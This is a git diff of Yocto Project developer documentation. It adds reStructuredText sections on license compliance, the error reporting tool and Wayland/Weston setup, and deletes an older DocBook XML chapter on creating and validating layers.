+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Compliance activities should begin before you generate the final image.
+The first thing you should look at is the requirement that tops the list
+for most compliance groups - providing the source. The Yocto Project has
+a few ways of meeting this requirement.
+
+One of the easiest ways to meet this requirement is to provide the
+entire :term:`DL_DIR` used by the
+build. This method, however, has a few issues. The most obvious is the
+size of the directory since it includes all sources used in the build
+and not just the source used in the released image. It will include
+toolchain source, and other artifacts, which you would not generally
+release. However, the more serious issue for most companies is
+accidental release of proprietary software. The Yocto Project provides
+an :ref:`archiver <ref-classes-archiver>` class to
+help avoid some of these concerns.
+
+Before you employ ``DL_DIR`` or the ``archiver`` class, you need to
+decide how you choose to provide source. The source ``archiver`` class
+can generate tarballs and SRPMs and can create them with various levels
+of compliance in mind.
+
+One way of doing this (but certainly not the only way) is to release
+just the source as a tarball. You can do this by adding the following to
+the ``local.conf`` file found in the
+:term:`Build Directory`:
+::
+
+ INHERIT += "archiver"
+ ARCHIVER_MODE[src] = "original"
+
+During the creation of your
+image, the source from all recipes that deploy packages to the image is
+placed within subdirectories of ``DEPLOY_DIR/sources`` based on the
+:term:`LICENSE` for each recipe.
+Releasing the entire directory enables you to comply with requirements
+concerning providing the unmodified source. It is important to note that
+the size of the directory can get large.
+
+A way to help mitigate the size issue is to only release tarballs for
+licenses that require the release of source. Let us assume you are only
+concerned with GPL code as identified by running the following script:
+
+.. code-block:: shell
+
+ # Script to archive a subset of packages matching specific license(s)
+ # Source and license files are copied into sub folders of package folder
+ # Must be run from build folder
+ #!/bin/bash
+ src_release_dir="source-release"
+ mkdir -p $src_release_dir
+ for a in tmp/deploy/sources/*; do
+ for d in $a/*; do
+ # Get package name from path
+ p=`basename $d`
+ p=${p%-*}
+ p=${p%-*}
+ # Only archive GPL packages (update *GPL* regex for your license check)
+ numfiles=`ls tmp/deploy/licenses/$p/*GPL* 2> /dev/null | wc -l`
+ if [ $numfiles -gt 1 ]; then
+ echo Archiving $p
+ mkdir -p $src_release_dir/$p/source
+ cp $d/* $src_release_dir/$p/source 2> /dev/null
+ mkdir -p $src_release_dir/$p/license
+ cp tmp/deploy/licenses/$p/* $src_release_dir/$p/license 2> /dev/null
+ fi
+ done
+ done
+
+At this point, you
+could create a tarball from the ``gpl_source_release`` directory and
+provide that to the end user. This method would be a step toward
+achieving compliance with section 3a of GPLv2 and with section 6 of
+GPLv3.
+
+Providing License Text
+~~~~~~~~~~~~~~~~~~~~~~
+
+One requirement that is often overlooked is inclusion of license text.
+This requirement also needs to be dealt with prior to generating the
+final image. Some licenses require the license text to accompany the
+binary. You can achieve this by adding the following to your
+``local.conf`` file:
+::
+
+ COPY_LIC_MANIFEST = "1"
+ COPY_LIC_DIRS = "1"
+ LICENSE_CREATE_PACKAGE = "1"
+
+Adding these statements to the
+configuration file ensures that the licenses collected during package
+generation are included on your image.
+
+.. note::
+
+ Setting all three variables to "1" results in the image having two
+ copies of the same license file. One copy resides in
+ ``/usr/share/common-licenses`` and the other resides in
+ ``/usr/share/license``.
+
+ The reason for this behavior is because
+ :term:`COPY_LIC_DIRS` and
+ :term:`COPY_LIC_MANIFEST`
+ add a copy of the license when the image is built but do not offer a
+ path for adding licenses for newly installed packages to an image.
+ :term:`LICENSE_CREATE_PACKAGE`
+ adds a separate package and an upgrade path for adding licenses to an
+ image.
+
+As the source ``archiver`` class has already archived the original
+unmodified source that contains the license files, you would have
+already met the requirements for inclusion of the license information
+with source as defined by the GPL and other open source licenses.
+
+Providing Compilation Scripts and Source Code Modifications
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+At this point, we have addressed all we need to prior to generating the
+image. The next two requirements are addressed during the final
+packaging of the release.
+
+By releasing the version of the OpenEmbedded build system and the layers
+used during the build, you will be providing both compilation scripts
+and the source code modifications in one step.
+
+If the deployment team has a :ref:`overview-manual/overview-manual-concepts:bsp layer`
+and a distro layer, and those
+those layers are used to patch, compile, package, or modify (in any way)
+any open source software included in your released images, you might be
+required to release those layers under section 3 of GPLv2 or section 1
+of GPLv3. One way of doing that is with a clean checkout of the version
+of the Yocto Project and layers used during your build. Here is an
+example:
+
+.. code-block:: shell
+
+ # We built using the dunfell branch of the poky repo
+ $ git clone -b dunfell git://git.yoctoproject.org/poky
+ $ cd poky
+ # We built using the release_branch for our layers
+ $ git clone -b release_branch git://git.mycompany.com/meta-my-bsp-layer
+ $ git clone -b release_branch git://git.mycompany.com/meta-my-software-layer
+ # clean up the .git repos
+ $ find . -name ".git" -type d -exec rm -rf {} \;
+
+One
+thing a development organization might want to consider for end-user
+convenience is to modify ``meta-poky/conf/bblayers.conf.sample`` to
+ensure that when the end user utilizes the released build system to
+build an image, the development organization's layers are included in
+the ``bblayers.conf`` file automatically:
+::
+
+ # POKY_BBLAYERS_CONF_VERSION is increased each time build/conf/bblayers.conf
+ # changes incompatibly
+ POKY_BBLAYERS_CONF_VERSION = "2"
+
+ BBPATH = "${TOPDIR}"
+ BBFILES ?= ""
+
+ BBLAYERS ?= " \
+ ##OEROOT##/meta \
+ ##OEROOT##/meta-poky \
+ ##OEROOT##/meta-yocto-bsp \
+ ##OEROOT##/meta-mylayer \
+ "
+
+Creating and
+providing an archive of the :term:`Metadata`
+layers (recipes, configuration files, and so forth) enables you to meet
+your requirements to include the scripts to control compilation as well
+as any modifications to the original source.
+
+Copying Licenses that Do Not Exist
+----------------------------------
+
+Some packages, such as the linux-firmware package, have many licenses
+that are not in any way common. You can avoid adding a lot of these
+types of common license files, which are only applicable to a specific
+package, by using the
+:term:`NO_GENERIC_LICENSE`
+variable. Using this variable also avoids QA errors when you use a
+non-common, non-CLOSED license in a recipe.
+
+The following is an example that uses the ``LICENSE.Abilis.txt`` file as
+the license from the fetched source:
+::
+
+ NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENSE.Abilis.txt"
+
+Using the Error Reporting Tool
+==============================
+
+The error reporting tool allows you to submit errors encountered during
+builds to a central database. Outside of the build environment, you can
+use a web interface to browse errors, view statistics, and query for
+errors. The tool works using a client-server system where the client
+portion is integrated with the installed Yocto Project
+:term:`Source Directory` (e.g. ``poky``).
+The server receives the information collected and saves it in a
+database.
+
+A live instance of the error reporting server exists at
+https://errors.yoctoproject.org. This server exists so that when
+you want to get help with build failures, you can submit all of the
+information on the failure easily and then point to the URL in your bug
+report or send an email to the mailing list.
+
+.. note::
+
+ If you send error reports to this server, the reports become publicly
+ visible.
+
+Enabling and Using the Tool
+---------------------------
+
+By default, the error reporting tool is disabled. You can enable it by
+inheriting the
+:ref:`report-error <ref-classes-report-error>`
+class by adding the following statement to the end of your
+``local.conf`` file in your
+:term:`Build Directory`.
+::
+
+ INHERIT += "report-error"
+
+By default, the error reporting feature stores information in
+``${``\ :term:`LOG_DIR`\ ``}/error-report``.
+However, you can specify a directory to use by adding the following to
+your ``local.conf`` file:
+::
+
+ ERR_REPORT_DIR = "path"
+
+Enabling error
+reporting causes the build process to collect the errors and store them
+in a file as previously described. When the build system encounters an
+error, it includes a command as part of the console output. You can run
+the command to send the error file to the server. For example, the
+following command sends the errors to an upstream server:
+::
+
+ $ send-error-report /home/brandusa/project/poky/build/tmp/log/error-report/error_report_201403141617.txt
+
+In the previous example, the errors are sent to a public database
+available at https://errors.yoctoproject.org, which is used by the
+entire community. If you specify a particular server, you can send the
+errors to a different database. Use the following command for more
+information on available options:
+::
+
+ $ send-error-report --help
+
+When sending the error file, you are prompted to review the data being
+sent as well as to provide a name and optional email address. Once you
+satisfy these prompts, the command returns a link from the server that
+corresponds to your entry in the database. For example, here is a
+typical link: https://errors.yoctoproject.org/Errors/Details/9522/
+
+Following the link takes you to a web interface where you can browse,
+query the errors, and view statistics.
+
+Disabling the Tool
+------------------
+
+To disable the error reporting feature, simply remove or comment out the
+following statement from the end of your ``local.conf`` file in your
+:term:`Build Directory`.
+::
+
+ INHERIT += "report-error"
+
+Setting Up Your Own Error Reporting Server
+------------------------------------------
+
+If you want to set up your own error reporting server, you can obtain
+the code from the Git repository at :yocto_git:`/cgit/cgit.cgi/error-report-web/`.
+Instructions on how to set it up are in the README document.
+
+.. _dev-using-wayland-and-weston:
+
+Using Wayland and Weston
+========================
+
+`Wayland <https://en.wikipedia.org/wiki/Wayland_(display_server_protocol)>`__
+is a computer display server protocol that provides a method for
+compositing window managers to communicate directly with applications
+and video hardware and expects them to communicate with input hardware
+using other libraries. Using Wayland with supporting targets can result
+in better control over graphics frame rendering than an application
+might otherwise achieve.
+
+The Yocto Project provides the Wayland protocol libraries and the
+reference
+`Weston <https://en.wikipedia.org/wiki/Wayland_(display_server_protocol)#Weston>`__
+compositor as part of its release. You can find the integrated packages
+in the ``meta`` layer of the :term:`Source Directory`.
+Specifically, you
+can find the recipes that build both Wayland and Weston at
+``meta/recipes-graphics/wayland``.
+
+You can build both the Wayland and Weston packages for use only with
+targets that accept the `Mesa 3D and Direct Rendering
+Infrastructure <https://en.wikipedia.org/wiki/Mesa_(computer_graphics)>`__,
+which is also known as Mesa DRI. This implies that you cannot build and
+use the packages if your target uses, for example, the Intel Embedded
+Media and Graphics Driver (Intel EMGD) that overrides Mesa DRI.
+
+.. note::
+
+ Due to lack of EGL support, Weston 1.0.3 will not run directly on the
+ emulated QEMU hardware. However, this version of Weston will run
+ under X emulation without issues.
+
+This section describes what you need to do to implement Wayland and use
+the Weston compositor when building an image for a supporting target.
+
+Enabling Wayland in an Image
+----------------------------
+
+To enable Wayland, you need to enable it to be built and enable it to be
+included (installed) in the image.
+
+.. _enable-building:
+
+Building Wayland
+~~~~~~~~~~~~~~~~
+
+To cause Mesa to build the ``wayland-egl`` platform and Weston to build
+Wayland with Kernel Mode Setting
+(`KMS <https://wiki.archlinux.org/index.php/Kernel_Mode_Setting>`__)
+support, include the "wayland" flag in the
+:term:`DISTRO_FEATURES`
+statement in your ``local.conf`` file:
+::
+
+ DISTRO_FEATURES_append = " wayland"
+
+.. note::
+
+ If X11 has been enabled elsewhere, Weston will build Wayland with X11
+ support
+
+.. _enable-installation-in-an-image:
+
+Installing Wayland and Weston
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To install the Wayland feature into an image, you must include the
+following
+:term:`CORE_IMAGE_EXTRA_INSTALL`
+statement in your ``local.conf`` file:
+::
+
+ CORE_IMAGE_EXTRA_INSTALL += "wayland weston"
+
+Running Weston
+--------------
+
+To run Weston inside X11, enabling it as described earlier and building
+a Sato image is sufficient. If you are running your image under Sato, a
+Weston Launcher appears in the "Utility" category.
+
+Alternatively, you can run Weston through the command-line interpretor
+(CLI), which is better suited for development work. To run Weston under
+the CLI, you need to do the following after your image is built:
+
+1. Run these commands to export ``XDG_RUNTIME_DIR``:
+ ::
+
+ mkdir -p /tmp/$USER-weston
+ chmod 0700 /tmp/$USER-weston
+ export XDG_RUNTIME_DIR=/tmp/$USER-weston
+
+2. Launch Weston in the shell:
+ ::
+
+ weston
diff --git a/documentation/dev-manual/dev-manual-common-tasks.xml b/documentation/dev-manual/dev-manual-common-tasks.xml
deleted file mode 100644
index e9ce182a59..0000000000
--- a/documentation/dev-manual/dev-manual-common-tasks.xml
+++ /dev/null
@@ -1,16022 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='extendpoky'>
-
-<title>Common Tasks</title>
- <para>
- This chapter describes fundamental procedures such as creating layers,
- adding new software packages, extending or customizing images,
- porting work to new hardware (adding a new machine), and so forth.
- You will find that the procedures documented here occur often in the
- development cycle using the Yocto Project.
- </para>
-
- <section id="understanding-and-creating-layers">
- <title>Understanding and Creating Layers</title>
-
- <para>
- The OpenEmbedded build system supports organizing
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink> into
- multiple layers.
- Layers allow you to isolate different types of customizations from
- each other.
- For introductory information on the Yocto Project Layer Model,
- see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
-
- <section id='creating-your-own-layer'>
- <title>Creating Your Own Layer</title>
-
- <para>
- It is very easy to create your own layers to use with the
- OpenEmbedded build system.
- The Yocto Project ships with tools that speed up creating
- layers.
- This section describes the steps you perform by hand to create
- layers so that you can better understand them.
- For information about the layer-creation tools, see the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a New BSP Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section in the Yocto Project Board Support Package (BSP)
- Developer's Guide and the
- "<link linkend='creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</link>"
- section further down in this manual.
- </para>
-
- <para>
- Follow these general steps to create your layer without using
- tools:
- <orderedlist>
- <listitem><para>
- <emphasis>Check Existing Layers:</emphasis>
- Before creating a new layer, you should be sure someone
- has not already created a layer containing the Metadata
- you need.
- You can see the
- <ulink url='http://layers.openembedded.org/layerindex/layers/'>OpenEmbedded Metadata Index</ulink>
- for a list of layers from the OpenEmbedded community
- that can be used in the Yocto Project.
- You could find a layer that is identical or close to
- what you need.
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Directory:</emphasis>
- Create the directory for your layer.
- When you create the layer, be sure to create the
- directory in an area not associated with the
- Yocto Project
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. the cloned <filename>poky</filename> repository).
- </para>
-
- <para>While not strictly required, prepend the name of
- the directory with the string "meta-".
- For example:
- <literallayout class='monospaced'>
- meta-mylayer
- meta-GUI_xyz
- meta-mymachine
- </literallayout>
- With rare exceptions, a layer's name follows this
- form:
- <literallayout class='monospaced'>
- meta-<replaceable>root_name</replaceable>
- </literallayout>
- Following this layer naming convention can
- save you trouble later when tools, components, or
- variables "assume" your layer name begins with "meta-".
- A notable example is in configuration files as
- shown in the following step where layer names without
- the "meta-" string are appended
- to several variables used in the configuration.
- </para></listitem>
- <listitem><para id='dev-layer-config-file-description'>
- <emphasis>Create a Layer Configuration File:</emphasis>
- Inside your new layer folder, you need to create a
- <filename>conf/layer.conf</filename> file.
- It is easiest to take an existing layer configuration
- file and copy that to your layer's
- <filename>conf</filename> directory and then modify the
- file as needed.</para>
-
- <para>The
- <filename>meta-yocto-bsp/conf/layer.conf</filename> file
- in the Yocto Project
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-yocto-bsp/conf'>Source Repositories</ulink>
- demonstrates the required syntax.
- For your layer, you need to replace "yoctobsp" with
- a unique identifier for your layer (e.g. "machinexyz"
- for a layer named "meta-machinexyz"):
- <literallayout class='monospaced'>
- # We have a conf and classes directory, add to BBPATH
- BBPATH .= ":${LAYERDIR}"
-
- # We have recipes-* directories, add to BBFILES
- BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
- ${LAYERDIR}/recipes-*/*/*.bbappend"
-
- BBFILE_COLLECTIONS += "yoctobsp"
- BBFILE_PATTERN_yoctobsp = "^${LAYERDIR}/"
- BBFILE_PRIORITY_yoctobsp = "5"
- LAYERVERSION_yoctobsp = "4"
- LAYERSERIES_COMPAT_yoctobsp = "&DISTRO_NAME_NO_CAP;"
- </literallayout>
- Following is an explanation of the layer configuration
- file:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBPATH'><filename>BBPATH</filename></ulink>:
- Adds the layer's root directory to BitBake's
- search path.
- Through the use of the
- <filename>BBPATH</filename> variable, BitBake
- locates class files
- (<filename>.bbclass</filename>),
- configuration files, and files that are
- included with <filename>include</filename> and
- <filename>require</filename> statements.
- For these cases, BitBake uses the first file
- that matches the name found in
- <filename>BBPATH</filename>.
- This is similar to the way the
- <filename>PATH</filename> variable is used for
- binaries.
- It is recommended, therefore, that you use
- unique class and configuration filenames in
- your custom layer.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILES'><filename>BBFILES</filename></ulink>:
- Defines the location for all recipes in the
- layer.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_COLLECTIONS'><filename>BBFILE_COLLECTIONS</filename></ulink>:
- Establishes the current layer through a
- unique identifier that is used throughout the
- OpenEmbedded build system to refer to the layer.
- In this example, the identifier "yoctobsp" is
- the representation for the container layer
- named "meta-yocto-bsp".
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PATTERN'><filename>BBFILE_PATTERN</filename></ulink>:
- Expands immediately during parsing to
- provide the directory of the layer.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBFILE_PRIORITY'><filename>BBFILE_PRIORITY</filename></ulink>:
- Establishes a priority to use for
- recipes in the layer when the OpenEmbedded build
- finds recipes of the same name in different
- layers.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LAYERVERSION'><filename>LAYERVERSION</filename></ulink>:
- Establishes a version number for the layer.
- You can use this version number to specify this
- exact version of the layer as a dependency when
- using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LAYERDEPENDS'><filename>LAYERDEPENDS</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LAYERDEPENDS'><filename>LAYERDEPENDS</filename></ulink>:
- Lists all layers on which this layer depends (if any).
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LAYERSERIES_COMPAT'><filename>LAYERSERIES_COMPAT</filename></ulink>:
- Lists the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Yocto Project</ulink>
- releases for which the current version is
- compatible.
- This variable is a good way to indicate if
- your particular layer is current.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Add Content:</emphasis>
- Depending on the type of layer, add the content.
- If the layer adds support for a machine, add the machine
- configuration in a <filename>conf/machine/</filename>
- file within the layer.
- If the layer adds distro policy, add the distro
- configuration in a <filename>conf/distro/</filename>
- file within the layer.
- If the layer introduces new recipes, put the recipes
- you need in <filename>recipes-*</filename>
- subdirectories within the layer.
- <note>
- For an explanation of layer hierarchy that
- is compliant with the Yocto Project, see
- the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-filelayout'>Example Filesystem Layout</ulink>"
- section in the Yocto Project Board
- Support Package (BSP) Developer's Guide.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Test for Compatibility:</emphasis>
- If you want permission to use the Yocto Project
- Compatibility logo with your layer or application that
- uses your layer, perform the steps to apply for
- compatibility.
- See the
- "<link linkend='making-sure-your-layer-is-compatible-with-yocto-project'>Making Sure Your Layer is Compatible With Yocto Project</link>"
- section for more information.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='best-practices-to-follow-when-creating-layers'>
- <title>Following Best Practices When Creating Layers</title>
-
- <para>
- To create layers that are easier to maintain and that will
- not impact builds for other machines, you should consider the
- information in the following list:
- <itemizedlist>
- <listitem><para>
- <emphasis>Avoid "Overlaying" Entire Recipes from Other Layers in Your Configuration:</emphasis>
- In other words, do not copy an entire recipe into your
- layer and then modify it.
- Rather, use an append file
- (<filename>.bbappend</filename>) to override only those
- parts of the original recipe you need to modify.
- </para></listitem>
- <listitem><para>
- <emphasis>Avoid Duplicating Include Files:</emphasis>
- Use append files (<filename>.bbappend</filename>)
- for each recipe that uses an include file.
- Or, if you are introducing a new recipe that requires
- the included file, use the path relative to the
- original layer directory to refer to the file.
- For example, use
- <filename>require recipes-core/</filename><replaceable>package</replaceable><filename>/</filename><replaceable>file</replaceable><filename>.inc</filename>
- instead of
- <filename>require </filename><replaceable>file</replaceable><filename>.inc</filename>.
- If you're finding you have to overlay the include file,
- it could indicate a deficiency in the include file in
- the layer to which it originally belongs.
- If this is the case, you should try to address that
- deficiency instead of overlaying the include file.
- For example, you could address this by getting the
- maintainer of the include file to add a variable or
- variables to make it easy to override the parts needing
- to be overridden.
- </para></listitem>
- <listitem><para>
- <emphasis>Structure Your Layers:</emphasis>
- Proper use of overrides within append files and
- placement of machine-specific files within your layer
- can ensure that a build is not using the wrong Metadata
- and negatively impacting a build for a different
- machine.
- Following are some examples:
- <itemizedlist>
- <listitem><para>
- <emphasis>Modify Variables to Support a
- Different Machine:</emphasis>
- Suppose you have a layer named
- <filename>meta-one</filename> that adds support
- for building machine "one".
- To do so, you use an append file named
- <filename>base-files.bbappend</filename> and
- create a dependency on "foo" by altering the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- variable:
- <literallayout class='monospaced'>
- DEPENDS = "foo"
- </literallayout>
- The dependency is created during any build that
- includes the layer
- <filename>meta-one</filename>.
- However, you might not want this dependency
- for all machines.
- For example, suppose you are building for
- machine "two" but your
- <filename>bblayers.conf</filename> file has the
- <filename>meta-one</filename> layer included.
- During the build, the
- <filename>base-files</filename> for machine
- "two" will also have the dependency on
- <filename>foo</filename>.</para>
- <para>To make sure your changes apply only when
- building machine "one", use a machine override
- with the <filename>DEPENDS</filename> statement:
- <literallayout class='monospaced'>
- DEPENDS_one = "foo"
- </literallayout>
- You should follow the same strategy when using
- <filename>_append</filename> and
- <filename>_prepend</filename> operations:
- <literallayout class='monospaced'>
- DEPENDS_append_one = " foo"
- DEPENDS_prepend_one = "foo "
- </literallayout>
- As an actual example, here's a snippet from the
- generic kernel include file
- <filename>linux-yocto.inc</filename>,
- wherein the kernel compile and link options are
- adjusted in the case of a subset of the supported
- architectures:
- <literallayout class='monospaced'>
- DEPENDS_append_aarch64 = " libgcc"
- KERNEL_CC_append_aarch64 = " ${TOOLCHAIN_OPTIONS}"
- KERNEL_LD_append_aarch64 = " ${TOOLCHAIN_OPTIONS}"
-
- DEPENDS_append_nios2 = " libgcc"
- KERNEL_CC_append_nios2 = " ${TOOLCHAIN_OPTIONS}"
- KERNEL_LD_append_nios2 = " ${TOOLCHAIN_OPTIONS}"
-
- DEPENDS_append_arc = " libgcc"
- KERNEL_CC_append_arc = " ${TOOLCHAIN_OPTIONS}"
- KERNEL_LD_append_arc = " ${TOOLCHAIN_OPTIONS}"
-
- KERNEL_FEATURES_append_qemuall=" features/debug/printk.scc"
- </literallayout>
- <note>
- Avoiding "+=" and "=+" and using
- machine-specific
- <filename>_append</filename>
- and <filename>_prepend</filename> operations
- is recommended as well.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Place Machine-Specific Files in
- Machine-Specific Locations:</emphasis>
- When you have a base recipe, such as
- <filename>base-files.bb</filename>, that
- contains a
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statement to a file, you can use an append file
- to cause the build to use your own version of
- the file.
- For example, an append file in your layer at
- <filename>meta-one/recipes-core/base-files/base-files.bbappend</filename>
- could extend
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
- using
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- as follows:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${BPN}:"
- </literallayout>
- The build for machine "one" will pick up your
- machine-specific file as long as you have the
- file in
- <filename>meta-one/recipes-core/base-files/base-files/</filename>.
- However, if you are building for a different
- machine and the
- <filename>bblayers.conf</filename> file includes
- the <filename>meta-one</filename> layer and
- the location of your machine-specific file is
- the first location where that file is found
- according to <filename>FILESPATH</filename>,
- builds for all machines will also use that
- machine-specific file.</para>
- <para>You can make sure that a machine-specific
- file is used for a particular machine by putting
- the file in a subdirectory specific to the
- machine.
- For example, rather than placing the file in
- <filename>meta-one/recipes-core/base-files/base-files/</filename>
- as shown above, put it in
- <filename>meta-one/recipes-core/base-files/base-files/one/</filename>.
- Not only does this make sure the file is used
- only when building for machine "one", but the
- build process locates the file more quickly.</para>
- <para>In summary, you need to place all files
- referenced from <filename>SRC_URI</filename>
- in a machine-specific subdirectory within the
- layer in order to restrict those files to
- machine-specific builds.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Perform Steps to Apply for Yocto Project Compatibility:</emphasis>
- If you want permission to use the
- Yocto Project Compatibility logo with your layer
- or application that uses your layer, perform the
- steps to apply for compatibility.
- See the
- "<link linkend='making-sure-your-layer-is-compatible-with-yocto-project'>Making Sure Your Layer is Compatible With Yocto Project</link>"
- section for more information.
- </para></listitem>
- <listitem><para>
- <emphasis>Follow the Layer Naming Convention:</emphasis>
- Store custom layers in a Git repository that use the
- <filename>meta-<replaceable>layer_name</replaceable></filename>
- format.
- </para></listitem>
- <listitem><para>
- <emphasis>Group Your Layers Locally:</emphasis>
- Clone your repository alongside other cloned
- <filename>meta</filename> directories from the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='making-sure-your-layer-is-compatible-with-yocto-project'>
- <title>Making Sure Your Layer is Compatible With Yocto Project</title>
-
- <para>
- When you create a layer used with the Yocto Project, it is
- advantageous to make sure that the layer interacts well with
- existing Yocto Project layers (i.e. the layer is compatible
- with the Yocto Project).
- Ensuring compatibility makes the layer easy to be consumed
- by others in the Yocto Project community and could allow you
- permission to use the Yocto Project Compatible Logo.
- <note>
- Only Yocto Project member organizations are permitted to
- use the Yocto Project Compatible Logo.
- The logo is not available for general use.
- For information on how to become a Yocto Project member
- organization, see the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>.
- </note>
- </para>
-
- <para>
- The Yocto Project Compatibility Program consists of a layer
- application process that requests permission to use the Yocto
- Project Compatibility Logo for your layer and application.
- The process consists of two parts:
- <orderedlist>
- <listitem><para>
- Successfully passing a script
- (<filename>yocto-check-layer</filename>) that
- when run against your layer, tests it against
- constraints based on experiences of how layers have
- worked in the real world and where pitfalls have been
- found.
- Getting a "PASS" result from the script is required for
- successful compatibility registration.
- </para></listitem>
- <listitem><para>
- Completion of an application acceptance form, which
- you can find at
- <ulink url='https://www.yoctoproject.org/webform/yocto-project-compatible-registration'></ulink>.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- To be granted permission to use the logo, you need to satisfy
- the following:
- <itemizedlist>
- <listitem><para>
- Be able to check the box indicating that you
- got a "PASS" when running the script against your
- layer.
- </para></listitem>
- <listitem><para>
- Answer "Yes" to the questions on the form or have an
- acceptable explanation for any questions answered "No".
- </para></listitem>
- <listitem><para>
- Be a Yocto Project Member Organization.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The remainder of this section presents information on the
- registration form and on the
- <filename>yocto-check-layer</filename> script.
- </para>
-
- <section id='yocto-project-compatible-program-application'>
- <title>Yocto Project Compatible Program Application</title>
-
- <para>
- Use the form to apply for your layer's approval.
- Upon successful application, you can use the Yocto
- Project Compatibility Logo with your layer and the
- application that uses your layer.
- </para>
-
- <para>
- To access the form, use this link:
- <ulink url='https://www.yoctoproject.org/webform/yocto-project-compatible-registration'></ulink>.
- Follow the instructions on the form to complete your
- application.
- </para>
-
- <para>
- The application consists of the following sections:
- <itemizedlist>
- <listitem><para>
- <emphasis>Contact Information:</emphasis>
- Provide your contact information as the fields
- require.
- Along with your information, provide the
- released versions of the Yocto Project for which
- your layer is compatible.
- </para></listitem>
- <listitem><para>
- <emphasis>Acceptance Criteria:</emphasis>
- Provide "Yes" or "No" answers for each of the
- items in the checklist.
- Space exists at the bottom of the form for any
- explanations for items for which you answered "No".
- </para></listitem>
- <listitem><para>
- <emphasis>Recommendations:</emphasis>
- Provide answers for the questions regarding Linux
- kernel use and build success.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='yocto-check-layer-script'>
- <title><filename>yocto-check-layer</filename> Script</title>
-
- <para>
- The <filename>yocto-check-layer</filename> script
- provides you a way to assess how compatible your layer is
- with the Yocto Project.
- You should run this script prior to using the form to
- apply for compatibility as described in the previous
- section.
- You need to achieve a "PASS" result in order to have
- your application form successfully processed.
- </para>
-
- <para>
- The script divides tests into three areas: COMMON, BSP,
- and DISTRO.
- For example, given a distribution layer (DISTRO), the
- layer must pass both the COMMON and DISTRO related tests.
- Furthermore, if your layer is a BSP layer, the layer must
- pass the COMMON and BSP set of tests.
- </para>
-
- <para>
- To execute the script, enter the following commands from
- your build directory:
- <literallayout class='monospaced'>
- $ source oe-init-build-env
- $ yocto-check-layer <replaceable>your_layer_directory</replaceable>
- </literallayout>
- Be sure to provide the actual directory for your layer
- as part of the command.
- </para>
-
- <para>
- Entering the command causes the script to determine the
- type of layer and then to execute a set of specific
- tests against the layer.
- The following list overviews the test:
- <itemizedlist>
- <listitem><para>
- <filename>common.test_readme</filename>:
- Tests if a <filename>README</filename> file
- exists in the layer and the file is not empty.
- </para></listitem>
- <listitem><para>
- <filename>common.test_parse</filename>:
- Tests to make sure that BitBake can parse the
- files without error (i.e.
- <filename>bitbake -p</filename>).
- </para></listitem>
- <listitem><para>
- <filename>common.test_show_environment</filename>:
- Tests that the global or per-recipe environment
- is in order without errors (i.e.
- <filename>bitbake -e</filename>).
- </para></listitem>
- <listitem><para>
- <filename>common.test_world</filename>:
- Verifies that <filename>bitbake world</filename> works.
- </para></listitem>
- <listitem><para>
- <filename>common.test_signatures</filename>:
- Tests to be sure that BSP and DISTRO layers do not
- come with recipes that change signatures.
- </para></listitem>
